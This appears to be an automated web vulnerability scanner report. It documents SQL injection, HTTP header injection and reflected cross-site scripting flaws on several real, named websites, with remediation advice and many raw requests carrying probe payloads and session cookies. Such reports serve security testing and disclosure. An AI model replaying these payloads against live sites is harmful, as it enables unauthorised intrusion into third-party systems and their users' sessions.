SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11532009'%20or%201%3d1--%20 and 11532009'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /vacation-rentals/mexico+1+311532009'%20or%201%3d1--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /vacation-rentals/mexico+1+311532009'%20or%201%3d2--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 49493120'%20or%201%3d1--%20 and 49493120'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /vacation-rentals/united-states+california+san-diego+3+72149493120'%20or%201%3d1--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /vacation-rentals/united-states+california+san-diego+3+72149493120'%20or%201%3d2--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19013238'%20or%201%3d1--%20 and 19013238'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /vacation-rentals/united-states+california+santa-cruz+3+74919013238'%20or%201%3d1--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /vacation-rentals/united-states+california+santa-cruz+3+74919013238'%20or%201%3d2--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 97937254'%20or%201%3d1--%20 and 97937254'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /vacation-rentals/united-states+california+south-lake-tahoe+3+4828397937254'%20or%201%3d1--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /vacation-rentals/united-states+california+south-lake-tahoe+3+4828397937254'%20or%201%3d2--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 95733272'%20or%201%3d1--%20 and 95733272'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /vacation-rentals/united-states+hawaii+2+1195733272'%20or%201%3d1--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /vacation-rentals/united-states+hawaii+2+1195733272'%20or%201%3d2--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15259239'%20or%201%3d1--%20 and 15259239'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /vacation-rentals/united-states+nevada+las-vegas+3+155215259239'%20or%201%3d1--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /vacation-rentals/united-states+nevada+las-vegas+3+155215259239'%20or%201%3d2--%20 HTTP/1.1 Host: vacationrentals.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /article/6007620/pop_print.shtml?content_type=article&content_type_id=6007620 HTTP/1.1 Host: www.associatedcontent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D; Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
Response 1 (redirected)
HTTP/1.0 200 OK Date: Sun, 14 Nov 2010 23:25:23 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2 X-Powered-By: PHP/5.3.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//"> <html> <head> <title>Childhood Obesity News - San Francisco Law Limits Fast Food Toys - Associated Content - associatedcontent.com</title> <meta http-e ...[SNIP]... <script type="text/javascript" src="http://ads.associatedcontent.com/www/delivery/spcjs.php?id=1&source=&cb=174122232187771239&slice=-0-&dma=-618-&cty=-US-&content_type=article&content_type_id=6007620&category_id=5&site_id=1&key_page=174122232187771239&ac_url=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml&loc=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml%3Fcontent_type_id%3D6007620%26cat%3D5&referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D%27%2520and%25201%253d1--%2520&zones=zone1%3D1%7Czone2%3D2%7Czone3%3D3%7Czone4%3D4%7Czone6%3D6%7Czone9%3D9%7Czone58%3D58&nz=1"></script>
</head> <body>
<script type="text/javascript"><!-- s.pageName="www:article";s.pageType="";s.prop21="www";s.prop4="174122232187757351";s.prop5="350957";s.prop14="no";s.prop18="Childhood Obesity News - San Francisco Law Limits Fast Food Toys";s.prop19="6007620";s.prop20="article";s.prop22="1";s.prop23="1";s.prop24="US";s.prop25="TX";s.prop26="Houston TX";s.prop27="Houston";s.prop28="713";s.prop29="5";s.prop32="general"; s.campaign="";s.events="";s.products=""; var s_code=s.t();if(s_code)document.write(s_code); s.linkTrackVars='prop30,prop31,prop33';if (s.prop20) s.prop30=s.prop20;if (s.prop29) s.prop31=s.prop29;s.prop33=s.prop32; //--></script> <script type="text/javascript">_qoptions={qacct:"p-32Swj5sJwj0d6",labels:"Health"};</script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> <noscript> <img src="http://pixel.quantserve.com/pixel/p-32Swj5sJwj0d6.gif?labels="Health" style="display: none;" border="0" height="1" width="1"/> </noscript>
GET /article/6007620/pop_print.shtml?content_type=article&content_type_id=6007620 HTTP/1.1 Host: www.associatedcontent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D; Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
Response 2 (redirected)
HTTP/1.0 200 OK Date: Sun, 14 Nov 2010 23:25:25 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2 X-Powered-By: PHP/5.3.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//"> <html> <head> <title>Childhood Obesity News - San Francisco Law Limits Fast Food Toys - Associated Content - associatedcontent.com</title> <meta http-e ...[SNIP]... <script type="text/javascript" src="http://ads.associatedcontent.com/www/delivery/spcjs.php?id=1&source=&cb=174122232187771250&slice=-0-&dma=-618-&cty=-US-&content_type=article&content_type_id=6007620&category_id=5&site_id=1&key_page=174122232187771250&ac_url=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml&loc=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml%3Fcontent_type_id%3D6007620%26cat%3D5&referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D%27%2520and%25201%253d2--%2520&zones=zone1%3D1%7Czone2%3D2%7Czone3%3D3%7Czone4%3D4%7Czone6%3D6%7Czone9%3D9%7Czone58%3D58&nz=1"></script>
</head> <body>
<script type="text/javascript"><!-- s.pageName="www:article";s.pageType="";s.prop21="www";s.prop4="174122232187757351";s.prop5="350957";s.prop14="no";s.prop18="Childhood Obesity News - San Francisco Law Limits Fast Food Toys";s.prop19="6007620";s.prop20="article";s.prop22="1";s.prop23="1";s.prop24="US";s.prop25="TX";s.prop26="Houston TX";s.prop27="Houston";s.prop28="713";s.prop29="5";s.prop32="general"; s.campaign="";s.events="";s.products=""; var s_code=s.t();if(s_code)document.write(s_code); s.linkTrackVars='prop30,prop31,prop33';if (s.prop20) s.prop30=s.prop20;if (s.prop29) s.prop31=s.prop29;s.prop33=s.prop32; //--></script> <script type="text/javascript">_qoptions={qacct:"p-32Swj5sJwj0d6",labels:"Health"};</script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> <noscript> <img src="http://pixel.quantserve.com/pixel/p-32Swj5sJwj0d6.gif?labels="Health" style="display: none;" border="0" height="1" width="1"/> </noscript>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the client request parameter is copied into the Location response header. The payload 7276c%0d%0a96ecccdd8a was submitted in the client parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=7276c%0d%0a96ecccdd8a HTTP/1.1 Host: 111.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 14 Nov 2010 23:04:42 GMT Server: Apache X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=64ec9846-bb52-23a8-43c8-0000231d7fb3; expires=Sat, 12-Feb-2011 23:04:42 GMT; path=/; domain=.xg4ken.com Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=7276c 96ecccdd8a P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
2.2. http://111.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://111.xg4ken.com
Path:
/media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 463f8%0d%0a528a1642c1b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml&463f8%0d%0a528a1642c1b=1 HTTP/1.1 Host: 111.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 14 Nov 2010 23:04:47 GMT Server: Apache X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=4df582d6-538d-b488-33fe-0000429ab8cd; expires=Sat, 12-Feb-2011 23:04:47 GMT; path=/; domain=.xg4ken.com Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml&463f8 528a1642c1b=1 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the url[] request parameter is copied into the Location response header. The payload e669a%0d%0ae28ea9c05d9 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2Fe669a%0d%0ae28ea9c05d9&client=ca-dp-godaddy2_xml HTTP/1.1 Host: 111.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 14 Nov 2010 23:04:38 GMT Server: Apache X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=57f27a3d-d285-68a8-5328-0000395dd34d; expires=Sat, 12-Feb-2011 23:04:38 GMT; path=/; domain=.xg4ken.com Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/e669a e28ea9c05d9?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the utm_campaign request parameter is copied into the Location response header. The payload 30b1f%0d%0aecfcd25a03f was submitted in the utm_campaign parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=30b1f%0d%0aecfcd25a03f&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1 Host: 111.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 14 Nov 2010 23:04:32 GMT Server: Apache X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=4c8b74bb-3954-8fa8-8326-0000577eace0; expires=Sat, 12-Feb-2011 23:04:32 GMT; path=/; domain=.xg4ken.com Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=30b1f ecfcd25a03f&client=ca-dp-godaddy2_xml P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the utm_medium request parameter is copied into the Location response header. The payload 82be3%0d%0ab09c9f27eec was submitted in the utm_medium parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=82be3%0d%0ab09c9f27eec&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1 Host: 111.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 14 Nov 2010 23:04:18 GMT Server: Apache X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=3cef34ad-6303-35a8-1b8f-00003fd62bad; expires=Sat, 12-Feb-2011 23:04:18 GMT; path=/; domain=.xg4ken.com Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=82be3 b09c9f27eec&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the utm_source request parameter is copied into the Location response header. The payload a9f0f%0d%0a3b6a61bb32f was submitted in the utm_source parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=a9f0f%0d%0a3b6a61bb32f&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1 Host: 111.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 14 Nov 2010 23:04:11 GMT Server: Apache X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=6676e6cc-44e7-2308-1a57-00001c552986; expires=Sat, 12-Feb-2011 23:04:11 GMT; path=/; domain=.xg4ken.com Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=a9f0f 3b6a61bb32f&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the utm_term request parameter is copied into the Location response header. The payload ca84c%0d%0aa3b87022440 was submitted in the utm_term parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=ca84c%0d%0aa3b87022440&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1 Host: 111.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 14 Nov 2010 23:04:26 GMT Server: Apache X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=45f848c0-6f73-7f49-52f3-00006d9772ca; expires=Sat, 12-Feb-2011 23:04:26 GMT; path=/; domain=.xg4ken.com Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=ca84c a3b87022440&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the c request parameter is copied into the Set-Cookie response header. The payload 1fb20%0d%0a9ce365740 was submitted in the c parameter. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191d2'-alert(1)-'5261f476c6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.mng_bang191d2'-alert(1)-'5261f476c6f/news_fr HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 421 Date: Sun, 14 Nov 2010 23:04:20 GMT Connection: close Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:04:20 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81a3'-alert(1)-'13182692657 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.mng_bang/news_frd81a3'-alert(1)-'13182692657 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 421 Date: Sun, 14 Nov 2010 23:04:21 GMT Connection: close Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 14-Dec-2010 23:04:21 GMT
3.3. http://a.collective-media.net/adj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.mng_bang/news_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0643'-alert(1)-'6bd51d1d378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
